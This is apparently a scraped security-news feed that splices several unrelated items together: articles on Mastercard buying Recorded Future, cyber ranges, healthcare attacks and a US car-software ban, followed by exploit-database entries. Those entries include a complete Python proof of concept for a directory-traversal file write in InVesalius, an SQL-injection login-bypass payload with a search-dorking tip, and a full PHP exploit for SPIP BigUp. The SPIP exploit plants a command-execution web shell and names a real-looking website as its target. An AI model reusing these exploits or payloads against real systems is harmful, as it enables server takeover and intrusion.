The $2.65B buy validates the growing importance of threat intelligence to enterprise security strategies.

Source: incamerastock via Alamy Stock Photo

Mastercard's $2.65 billion acquisition of Recorded Future has focused attention on the increasing value of cyber-threat intelligence (CTI) to enterprise security strategies.

Security experts in the space perceive the deal as validating the business criticality of CTI and accelerating its mainstream adoption.

**A Multibillion-Dollar Bet**

Mastercard on Sept. 12 announced it had agreed to acquire Recorded Future for $2.65 billion — nearly equivalent to the cumulative amount it paid in nine previous purchases of cybersecurity vendors. Mastercard has said it will leverage Recorded Future's threat intelligence capabilities to bolster its own anti-fraud capabilities and to strengthen the third-party services it delivers via previous acquisitions such as RiskRecon.

The deal is expected to close in Q1 of 2025.

Fernando Montenegro, an analyst with Omdia, says Mastercard's acquisition aligns with the financial firm's efforts to integrate multiple capabilities around its suite of anti-fraud services. "One of the key components of successful anti-fraud initiatives is accurate threat intelligence, so it makes sense for Mastercard to improve their capabilities there," Montenegro says. "I think the deal shows that threat intelligence can be immensely valuable not only to pure-play cybersecurity efforts, but to broader anti-fraud initiatives as well."

The Business Research Company expects demand for cyber-threat intelligence services to hit some $11.5 billion in revenue in 2024, and to more than double to $25.68 billion in 2028, at a compound annual growth rate (CAGR) of 21.7%. The analyst firm identified the primary growth drivers as an increase in the volume and sophistication of cyberattacks, cloud adoption, a constantly expanding attack surface, and increasing regulatory pressures. Others, like Statista think the market is currently even larger — $14.59 billion in 2023 — but have a more modest annual growth rate expectation of 14.7% between now and 2030.

**Validation for CTI?**

Beenu Arora, CEO and co-founder of Cyble, sees the pending transaction as further cementing the role of threat intelligence in business strategies. The rapidly changing and increasingly sophisticated threat landscape has increased the importance of intelligence on emerging threats, threat groups, and their tactics, techniques, and procedures, Arora says. Now perceived as a highly technical component of SecOps, CTI has moved to front and center of security strategy at a growing number of organizations.

"If you speak to any seasoned CTO, CISO, or chief executive, there’s always concern about how they can make the right decisions" around what assets to protect, how, and against whom, Arora says. "Over the last 10 to 15 years, I think there has been much greater awareness with regard to how threat intelligence can sit at the center of day-to-day decision making for the business, whether that’s managing risk, safeguarding assets, or using external intelligence to help guide business decisions."

Analyst firm IT-Harvest, which maintains a dashboard tracking the performance of more than 4,050 cybersecurity vendors globally, counts 123 vendors as currently engaged in the cyber-threat intelligence space. Of that number, 63 have experienced headcount growth this year. Mastercard's recent acquisition underscores the value these vendors can bring to enterprise security strategies, says Richard Stiennon, chief research analyst at IT-Harvest.

"I think the acquisition is good for the 122 other threat intelligence vendors whose prospects will improve in the eyes of investors," Stiennon says.

The $2.65 billion that Mastercard has agreed to pay for Recorded Future is roughly 6.5 times the latter's annual revenue run rate. While that valuation is less than the 10-times valuations that cybersecurity firms garnered back in 2021 and 2022, it still is a healthy number, Stiennon says.

Many of the organizations that deliver CTI services, such as Recorded Future, Group-IB Flashpoint, and Digital Shadows, are what might be regarded as pure-play vendors in the space. Others, such as Mandiant, CrowdStrike, Kaspersky, IBM X-Force, Cisco Talos, and Palo Alto Networks, deliver threat intelligence as part of a broader portfolio of security services. All these vendors use a combination of open source intelligence (OSINT) and information from proprietary sources to deliver their CTI feeds.

"The acquisition validates the widespread, growing recognition that threat intelligence is no longer a complement to an organization's security posture," says Josh Lefkowitz, founder and CEO of Flashpoint. Organizations and government agencies are using threat intelligence to combat ransomware, protect data, lock down supply chains, prioritize critical vulnerabilities, and protect their people and assets.

"I’m constantly speaking with security leaders at organizations that consider these applications of threat intelligence critical to their daily operations," Lefkowitz notes.

He adds that Mastercard's Recorded Future purchase is bringing attention to the board level of the business criticality of CTI.

Don't miss the latest Dark Reading Confidential podcast, where we talk to two cybersecurity professionals who were arrested in Dallas County, Iowa, and forced to spend the night in jail — just for doing their pen-testing jobs. Listen now!

**About the Author**

Jai Vijayan is a seasoned technology reporter with over 20 years of experience in IT trade journalism. He was most recently a Senior Editor at Computerworld, where he covered information security and data privacy issues for the publication. Over the course of his 20-year career at Computerworld, Jai also covered a variety of other technology topics, including big data, Hadoop, Internet of Things, e-voting, and data analytics. Prior to Computerworld, Jai covered technology issues for The Economic Times in Bangalore, India. Jai has a Master's degree in Statistics and lives in Naperville, Ill.

Mastercard's Bet on Recorded Future a Win for Cyber-Threat Intel

Cyber ranges are a great way for cyber professionals to keep up on emerging threats and new technologies — while having a little fun.

Source: dpa picture alliance via Alamy Stock Photo

Staying on top of the evolving cyber threat landscape can be a challenge for cybersecurity professionals. The daily grind of the job leaves little time for mastering the latest threats and tools, but cyber ranges offer a way to keep skills fresh — and maybe have a little bit of fun at the same time.

Governments, universities, and workplace training organizations have been running these simulated training environments, which give users a place to practice using the networks, systems, tools, and applications they will encounter on the job, for more than two decades. Yet cyber ranges remain a vital tool in the arsenal of the cyber professional looking to stay on top of emerging threats and new technologies.

Most recently, last month the National Aviation University in Ukraine launched the Cyber Range UA, a virtual platform dedicated to simulating real-world attacks, as part of an effort to provide cybersecurity training in Ukraine. And last October the US Navy announced the opening of the Department of Defense's fourth cyber range, the National Cyber Range at Naval Air Station Patuxent River, dedicated to testing and training initiatives for aircraft, their subsystems, and supportive technologies. Its other cyber range facilities focus on the Air Force, submarines and ships, and mission-force training.

"On top of being the most capable, defense technology is also required to be cyber-resilient," said John Ross, deputy director of the National Cyber Range, part of the Naval Air Warfare Center Aircraft Division (NAWCAD), in a statement. "We harden warfighter systems by performing vulnerability assessments and recommending mitigations — ultimately preventing adversaries from stealing our data or defeating our technology."

**Cyber Ranges as a Business**

But cyber ranges aren't all wargames. In the private sector, the SANS Institute has been running its NetWars cyber range competition since 2009 for the wider cybersecurity community, and its free Holiday Hack Challenge has about 20,000 participants annually. SANS holds a variety of cyber range competitions for individuals and teams, all focused on making sure cybersecurity professionals are at the top of their game.

"How do you maintain mission preparedness? How do you make sure that you're ready on a continuing basis? That's where ranges come in," says Ed Skoudis, president of the SANS Technology Institute, who leads the team that develops cyber ranges for SANS.

The organization designs its ranges to build real-world skills in a gaming environment. Some of the ranges are designed to be completed in three to six hours, while others can be accessed over the course of four months, depending on the complexity and time commitment users and companies are able to make. SANS also builds custom ranges for clients who are looking to bolster specific skill sets or experience business-relevant training simulations.

"Sometimes customers will come to us with a very specific need," Skoudis says. "They need something with certain specific content, maybe a particular mix of cloud providers, a particular SIEM solution, or particular challenges associated with certain applications or SaaS offerings. They'll come to us, and we will create custom ranges for them."

The team members make sure they're up-to-date on the current threat and technology environments by working as cybersecurity consultants or range designers.

"We'll learn things from the real world, build it in the range, see people attacking it and dissecting it, and doing all kinds of things with it, and then we can take that and apply it in our consulting services," Skoudis says. "So it's this virtuous cycle of consulting and range building."

At the same time, the designers are working to make participation as entertaining as it is practical, no matter how well they do, he adds.

"We try to make our ranges fun," Skoudis says. "I want the person who came in 92nd place ... to say, 'I really enjoyed that. I learned from it. I had a good time. I am a better cybersecurity professional for having participated in that range, even though I came in 92nd place.'"

**Gamification for National Security**

Singapore's Home Team Science & Technology (HTX) agency recently commissioned a custom cyber range from SANS to help boost the skills of its practitioners in an engaging way.

"The gamification of cybersecurity helps to raise awareness of new attack surfaces from emerging technologies, such as artificial intelligence (AI), in a more engaging manner," says Tay Sze Ying, head of cyber threat intelligence and hunting, xCybersecurity, at HTX. "It also allows the participants to better understand how such emerging technologies are used in the field of homeland security and the potential impact they have on daily lives. We also hoped that the participating teams could, through this initiative, explore how AI is useful in investigating cyber incidents on Internet of Things (IoT) devices, such as drones and networked cameras."

Leadership at the agency was looking for innovative ways to benchmark the team's cybersecurity competency on both a local and international level, and senior management was excited by the idea of gamification when it came to homeland security use cases, Tay says.

The team's biggest struggles came from finding ways to complete the project in the tight time frame.

"During this journey, we had to quickly adapt to the dynamics of organizing a large-scale physical event, articulate homeland security contexts to the challenge developers, and even validate each of the technical challenges within the cyber range," Tay says. "This was a truly enriching and memorable experience. Now that we have experience in doing this, we will explore creating more innovative competition formats in the future."

**Cyber Ranges Built Right In**

Companies are also dreaming up new ways to leverage cyber ranges for training and to differentiate their offerings from the competition. For example, managed detection and response provider Critical Start has worked a cyber range feature into its dashboard so that customers can practice responding to system alerts in real time. The cyber range feature is available to all of Critical Start's managed service customers for free, but it's also a valuable sales and onboarding tool, says Chris Carlson, chief product officer at Critical Start.

"While we hook them up to the security tools, and while we onboard their MDR service, their analysts now can start looking at curated and anonymized real-world alerts and get started right away," Carlson says. "Now they can start to practice and be prepared when these alerts start happening."

The offering is something the company hopes will be a highlight for customers, as it gives an easy way to keep training and learning how to combat emerging threats while on the job. The company will continue to update the range as threats develop in the wild.

"There's not a lot of training that kind of happens to cybersecurity professionals, right? They have certain credentials, they get the job, and they're doing the job 50 hours a week, and there's no time to learn," Carlson says. "This is now a built-in capability in the same platform where they do their day job."

**About the Author**

Jennifer Lawinski is a writer and editor with more than 20 years experience in media, covering a wide range of topics including business, news, culture, science, technology and cybersecurity. After earning a Master's degree in Journalism from Boston University, she started her career as a beat reporter for The Daily News of Newburyport. She has since written for a variety of publications including CNN, Fox News, Tech Target, CRN, CIO Insight, MSN News and Live Science. She lives in Brooklyn with her partner and two cats.

Target Practice: Honing Critical Skills on Cyber Ranges

The ABB BMS/BAS controller suffers from a remote code execution vulnerability. The vulnerable uploadFile() function in bigUpload.php improperly reads raw POST data using the php://input wrapper without sufficient validation. This data is passed to the fwrite() function, allowing arbitrary file writes. Combined with an improper sanitization of file paths, this leads to directory traversal, allowing an attacker to upload malicious files to arbitrary locations. Once a malicious file is written to an executable directory, an authenticated attacker can trigger the file to execute code and gain unauthorized access to the building controller.

ABB Cylon Aspect 3.08.01 (bigUpload.php) Remote Code Execution

The BMS/BAS controller suffers from an arbitrary file deletion vulnerability. Input passed to the 'file' parameter in 'databasefiledelete.php' is not properly sanitised before being used to delete files. This can be exploited by an unauthenticated attacker to delete files with the permissions of the web server using directory traversal sequences passed within the affected POST parameter.

ABB Cylon Aspect 3.08.01 (databaseFileDelete.php) Arbitrary File Delete

Healthcare organizations face a 32% surge in cyberattacks, with sensitive patient data being sold on the Dark Web.…

Healthcare organizations face a 32% surge in cyberattacks, with sensitive patient data being sold on the Dark Web. Hospitals worldwide are vulnerable, as cybercriminals exploit weak defenses and digital health records.

A new report has revealed a troubling trend: healthcare organizations across the globe are falling victim to increasingly **sophisticated cyberattacks**, leaving patients and patients’ families vulnerable to financial gain.

According to recent data from Check Point Research, the global weekly average number of attacks per organization within the healthcare industry has increased by 32% over the same period last year, reaching a staggering 2,018 per week.

The targeted institutions, including vulnerable hospitals, are constantly under the triple threat of cybercrime such as ransomware attacks, data theft, and even selling access to these critical healthcare networks on the dark web.

A closer look at the data reveals that around the world, the top regions of attack are:

****The Asia-Pacific (APAC)****

The Asia-Pacific (APAC) region has suffered the most from these attacks. With 4,556 weekly attacks per organization, a 54% increase, this region is responsible for the majority of healthcare cyberattacks, driven by the rapid expansion of digital health records and telemedicine.

****Latin America****

Latin America also faced a substantial increase in these attacks. With 2,703 weekly attacks per organization, a 34% increase, this region is particularly vulnerable due to weaker regulations and underfunded cyber security initiatives.

****Europe****

According to Check Point’s **report**, Europe, despite experiencing fewer weekly attacks at an average of 1,686, saw the largest percentage increase at 56%, highlighting a growing reliance on digital tools without parallel investments in security.

****North America****

North America, with 1,607 weekly attacks and a 20% increase, remains a prime target due to the wealth of sensitive patient data and established digital infrastructure.

The impact of these cyberattacks is severe. The situation is serious enough that the World Health Organization (WHO) has called for caution, declaring 17 September **World Patient Safety Day** to highlight the risks associated with cyberattacks in the healthcare industry.

On the other hand, cybercriminals are also using ransomware-as-a-service (RaaS) to target healthcare organizations, partnering with others to carry out attacks and siphoning off sensitive data.

A real-life example, according to Check Point, involves a hacker known as Cicada3301, who posted an advertisement on a Russian-language underground forum offering ransomware-as-a-service. He demands a 20% commission on successful attacks and even provides negotiation mechanisms for disputes among partners.

To mitigate these risks, healthcare organizations must adopt comprehensive cybersecurity measures, including technological solutions, employee training, and improved security policies. Key steps include using anti-ransomware solutions, regularly backing up data, segmenting and limiting access to information, educating staff on recognizing cyber threats, installing updates and patches, and ensuring strong passwords and multi-factor authentication.

Compliance with national and international privacy standards and regulations is also important to ensure patient safety. By securing all devices and using the best security solutions, healthcare organizations can better protect themselves against cyber criminals and protect the well-being of their patients.

1.  **7TB of Healthcare Data Leak Affects 12 Million Patients**
2.  **AI in Healthcare: ChatGPT Helps Diagnosis After Doctors Fail**
3.  **8220 Gang Targets Healthcare in Global Cryptojacking Attack**
4.  **Chinese Malware Targets European Healthcare via USB Drives**
5.  **PData of 75,000 people exposed in HealthCare.gov system hack  
    **

Dark Web Sales Fuel 32% Increase in Global Healthcare Cyberattacks

After launching an investigation in February into vehicles made by foreign adversaries, the Biden administration is finally making its move in the name of national security.

Source: Daniren via Alamy Stock Photo

The US Department of Commerce (DoC) today announced a proposed ban on the software and hardware made by foreign adversaries, particularly that of China and Russia, used in connected vehicles on US roads.

"Connected" vehicles are those with onboard network hardware that allows for Internet access, permitting them to share data with devices both inside and outside the vehicle.

This move is reportedly due to national security concerns and would ban nearly all Chinese vehicles from the US market. It would also prohibit the testing of self-driving cars in the US by foreign adversaries as well as force American automakers to remove the software and hardware from these adversaries in their vehicles.

"When foreign adversaries build software to make a vehicle, that means it can be used for surveillance, can be remotely controlled, which threatens the privacy and safety of Americans on the road," Commerce Secretary Gina Raimondo said in a briefing, noting that foreign adversaries could cause crashes and block roads in extreme circumstances. 

This isn't the first time automotive cybersecurity concerns have brought up by the Biden administration, however. Back in February, the White House launched an investigation into whether Chinese vehicle imports were a threat to national security — it's now clear that the administration found its answer. 

A senior administration official reportedly confirmed that while nearly all Chinese cars and trucks will be banned, foreign automakers of concern will be allowed to seek out special authorizations to be exempted from such regulations.

The proposal is expected to make the software ban effective in the 2027 model year and the hardware ban in the 2030 model year or January 2029. The public will have 30 days to comment on the proposal, and the Commerce Department expects to have it finalized by Jan. 20.

**About the Author**

Commerce Dept. Proposes Ban on Automotive Software &amp; Hardware From China, Russia

Proof of concept python3 code that creates a malicious payload to exploit an arbitrary file write via directory traversal in Invesalius version 3.1. In particular the exploitation steps of this vulnerability involve the use of a specifically crafted .inv3 (a custom extension for InVesalius) that is indeed a tar file file which, once imported inside the victim's client application allows an attacker to write files and folders on the disk.

    # Exploit Title: Invesalius 3.1 - Arbitrary File Write using Directory Traversal # Discovered By: Riccardo Degli Esposti (partywave)# Exploit Author: Riccardo Degli Esposti (partywave)# Vendor Homepage: https://invesalius.github.io/# Software Link: https://github.com/invesalius/invesalius3/tree/master/invesalius# Version: from 3.1.99995# Tested on: Windows# CVE-ID: CVE-2024-44825import tarfileimport osimport zipfile# Disclaimer:# Tested on Windows# edit every [CHANGEME] before run this script# Step 0: Setup local paths# Adapt your pathszip_file_path = 'C:\\users\\[CHANGEME]\\downloads\\[CHANGEME].zip'extracted_folder = 'C:\\users\\[CHANGEME]\\downloads\\[CHANGEME]'output_tar = 'C:\\users\\[CHANGEME]\\downloads\\local-output.inv3'main_plist_path = os.path.join(extracted_folder, 'main.plist')# Ensure the extraction directory existsos.makedirs(extracted_folder, exist_ok=True)# Step 1: Extract the ZIP filewith zipfile.ZipFile(zip_file_path, 'r') as zip_ref:    zip_ref.extractall(extracted_folder)with open(main_plist_path, 'r') as file:    main_plist_content = file.read()# POC of loading new XMLmain_plist_content = main_plist_content.replace(    '<string>ProMED CT 0051</string>',     '<string>This is a confirmation modifying the XML</string>')with open(main_plist_path, 'w') as file:    file.write(main_plist_content)# Step 3: Create the tar archive# Adapt where you want writedef rename(tarinfo):    tarinfo.name = "..\\..\\[CHANGEME]\\" + tarinfo.name    return tarinfowith tarfile.open(output_tar, "w:xz") as tar:    for root, _, files in os.walk(extracted_folder):        for file in files:            full_path = os.path.join(root, file)            arcname = os.path.relpath(full_path, extracted_folder)            tar.add(full_path, arcname=arcname, filter=rename)output_tar

Invesalius 3.1 Arbitrary File Write / Directory Traversal

Debian Linux Security Advisory 5774-1 - It was discovered that ruby-saml, a SAML library implementing the client side of a SAML authorization, does not properly verify the signature of the SAML Response, which could result in bypass of authentication in an application using the ruby-saml library.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5774-1                   security@debian.orghttps://www.debian.org/security/                     Salvatore BonaccorsoSeptember 20, 2024                    https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : ruby-samlCVE ID         : CVE-2024-45409Debian Bug     : 1081560It was discovered that ruby-saml, a SAML library implementing the clientside of a SAML authorization, does not properly verify the signature ofthe SAML Response, which could result in bypass of authentication in anapplication using the ruby-saml library.For the stable distribution (bookworm), this problem has been fixed inversion 1.13.0-1+deb12u1.We recommend that you upgrade your ruby-saml packages.For the detailed security status of ruby-saml please refer to itssecurity tracker page at:https://security-tracker.debian.org/tracker/ruby-samlFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQKTBAEBCgB9FiEERkRAmAjBceBVMd3uBUy48xNDz0QFAmbtwvxfFIAAAAAALgAoaXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDQ2NDQ0MDk4MDhDMTcxRTA1NTMxRERFRTA1NENCOEYzMTM0M0NGNDQACgkQBUy48xNDz0T5Rw//chUPp0lZSQP5tWnyblbMyBbmVbqSfl1genngyWPv0aKts/ugJ1GBOw8in26OOvcn+clgSFa3LQRw3FPkRxSuKtnLs2xHc++tcG46YdpFT1JEc26KpEuBu6d6nCaMKfoveWSoNvhT3TGo3CMM/SKvxsc2KQgr3x9cJWr892m54MSqB3PUA0jYlCPu8s5EOyygkTf4T0Ogjjcz+IUWwEmuzqyazsSu8GyLx1DVyKyomMVrjNq3b9DhTR5WxK+X6miVVyldfccfG4khFAR9RvpIVltBpQBnjaCmWGn+ryKu23vN5eZoA2Cb+qToEVFd/2HwbXaLowVDyChbtuKhaR+M3pGgCRW2AYHFILZxYWM0+hgMx4NOgIANywm5xsK+hYEPJdWyI5sYqq/OUINKZOcw+m/xGf7hZTcctuPp3w4lNxGxINZOnl11Bv01tQjK1PtsIuVDWX3bk6hk7h4Y5khedyDhceAk/ENbZs9r79ejoGYRHiMhtUpnQep33zXSZdsD051v1VIWq6Wrb2HFu5EABNRJ6EdzfjilXperDnwTYvgjktAwwmvWDhyPv0Ii5d+81HntH6koeT7YCWAJp6EFMCf+8PmkZPeC60hxZ6lGscFMJJp6iqkXdw7fKSVV4tsEAD73sCgGs90voChnvxM7EFdVA3z4VfVnV9nm4GhF5O4=TVF9-----END PGP SIGNATURE-----

Debian Security Advisory 5774-1

Registration and Login System version 1.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

    =============================================================================================================================================| # Title     : Registration and Login System v1.0 auth by pass Vulnerability                                                               || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                            || # Vendor    : https://phpgurukul.com/wp-content/uploads/2017/12/User-Registration-and-login-System-with-admin-panel.zip                   |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : user & pass = ' or 0=0 ##[+] http://127.0.0.1/loginsystem/admin/dashboard.phpGreetings to :=====================================================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|===================================================================================================

Registration And Login System 1.0 SQL Injection

SPIP BigUp version 4.3.1 suffers from a remote PHP code injection vulnerability.

    =============================================================================================================================================| # Title     : SPIP BigUp 4.3.1 php code injection Vulnerability                                                                           || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits)                                                            || # Vendor    : https://www.spip.net/                                                                                                       |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] This exploits a php code injection vulnerability in the BigUp plugin of SPIP.    The vulnerability lies in the lister_fichiers_par_champs function, which is triggered when the bigup_retrouver_fichiers parameter is set to any value.   By exploiting the improper handling of multipart form data in file uploads, an attacker can inject and execute arbitrary PHP code on the target server.   It allows unauthenticated users to execute arbitrary code remotely via the public interface. [+] Line 143 : Set your target & payload .[+] Save Payload as poc.php and run from cmd = C:\www\test>php poc.php[+] Payload :<?phpclass indoushka {    private $targetUri;    private $formPage;    private $payload;    public function __construct($targetUri, $formPage = 'auto', $payload) {        $this->targetUri = $targetUri;        $this->formPage = $formPage;        $this->payload = $payload;    }    public function check() {        $spipVersion = $this->getSpipVersion();        if (!$spipVersion) {            return "Unable to determine the version of SPIP.";        }        echo "SPIP Version detected: " . $spipVersion . "\n";        $vulnerableRanges = [            ['start' => '4.0.0', 'end' => '4.1.17'],            ['start' => '4.2.0', 'end' => '4.2.15'],            ['start' => '4.3.0', 'end' => '4.3.1']        ];        $isVulnerable = false;        foreach ($vulnerableRanges as $range) {            if (version_compare($spipVersion, $range['start'], '>=') && version_compare($spipVersion, $range['end'], '<=')) {                $isVulnerable = true;                break;            }        }        if (!$isVulnerable) {            return "The detected SPIP version ($spipVersion) is not vulnerable.";        }        echo "SPIP version $spipVersion is vulnerable.\n";        return "SPIP version $spipVersion is vulnerable.";    }    private function getSpipVersion() {        // This function should make an HTTP request to detect the SPIP version        // Return the version or false if undetectable        return '4.3.1'; // Example version, replace with actual logic    }    private function getFormData() {        $pages = ['login', 'spip_pass', 'contact'];        if ($this->formPage !== 'auto') {            $pages = [$this->formPage];        }        foreach ($pages as $page) {            $url = $this->normalizeUri($page);            $response = $this->sendRequest('GET', $url);            if ($response['status'] === 200) {                libxml_use_internal_errors(true); // Prevent warnings from invalid HTML                $doc = new DOMDocument();                @$doc->loadHTML($response['body']);                libxml_clear_errors();                $inputs = $doc->getElementsByTagName('input');                if ($inputs->length > 1) {                    $action = $inputs->item(0)->getAttribute('value');                    $args = $inputs->item(1)->getAttribute('value');                                        if ($action && $args) {                        echo "Found formulaire_action: $action\n";                        echo "Found formulaire_action_args: " . substr($args, 0, 20) . "...\n";                        return ['action' => $action, 'args' => $args];                    }                }            }        }        return null;    }    private function normalizeUri($page) {        return rtrim($this->targetUri, '/') . '/' . ltrim($page, '/');    }    private function sendRequest($method, $url, $data = null) {        $ch = curl_init();        curl_setopt($ch, CURLOPT_URL, $url);        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);        if ($method === 'POST' && $data) {            curl_setopt($ch, CURLOPT_POST, true);            curl_setopt($ch, CURLOPT_POSTFIELDS, $data);            curl_setopt($ch, CURLOPT_HTTPHEADER, [                'Content-Type: multipart/form-data; boundary=' . substr($data, 2, 32)            ]);        }        $response = curl_exec($ch);        $httpCode = curl_getinfo($ch, CURLINFO_HTTP_CODE);        curl_close($ch);        return ['status' => $httpCode, 'body' => $response];    }    private function encodePayload() {        return base64_encode($this->payload);    }    public function exploit() {        $formData = $this->getFormData();        if (!$formData) {            echo "Could not retrieve formulaire_action or formulaire_action_args value from any page.\n";            return;        }        echo "Preparing to send exploit payload to the target...\n";        $encodedPayload = $this->encodePayload();        $boundary = '----WebKitFormBoundary' . bin2hex(random_bytes(16));        $postData = "--$boundary\r\n";        $postData .= 'Content-Disposition: form-data; name="formulaire_action"' . "\r\n\r\n" . $formData['action'] . "\r\n";        $postData .= "--$boundary\r\n";        $postData .= 'Content-Disposition: form-data; name="bigup_retrouver_fichiers"' . "\r\n\r\n" . $this->randomString() . "\r\n";        $postData .= "--$boundary\r\n";        $postData .= 'Content-Disposition: form-data; name="' . $this->randomString() . '[".base64_decode(\'' . $encodedPayload . '\').die()."]"; filename="' . $this->randomString() . '"' . "\r\n\r\n\r\n";        $postData .= "--$boundary\r\n";        $postData .= 'Content-Disposition: form-data; name="formulaire_action_args"' . "\r\n\r\n" . $formData['args'] . "\r\n";        $postData .= "--$boundary--\r\n";        $this->sendRequest('POST', $this->normalizeUri('spip.php'), $postData);    }    private function randomString($length = 8) {        return bin2hex(random_bytes($length / 2));    }}// Usage example:$exploit = new indoushka('https://yonnelautre.fr/', 'auto', '<?php if (isset($_GET["cmd"])) { system($_GET["cmd"]); } ?>');$exploit->check();$exploit->exploit();?>Greetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

Tag

#auth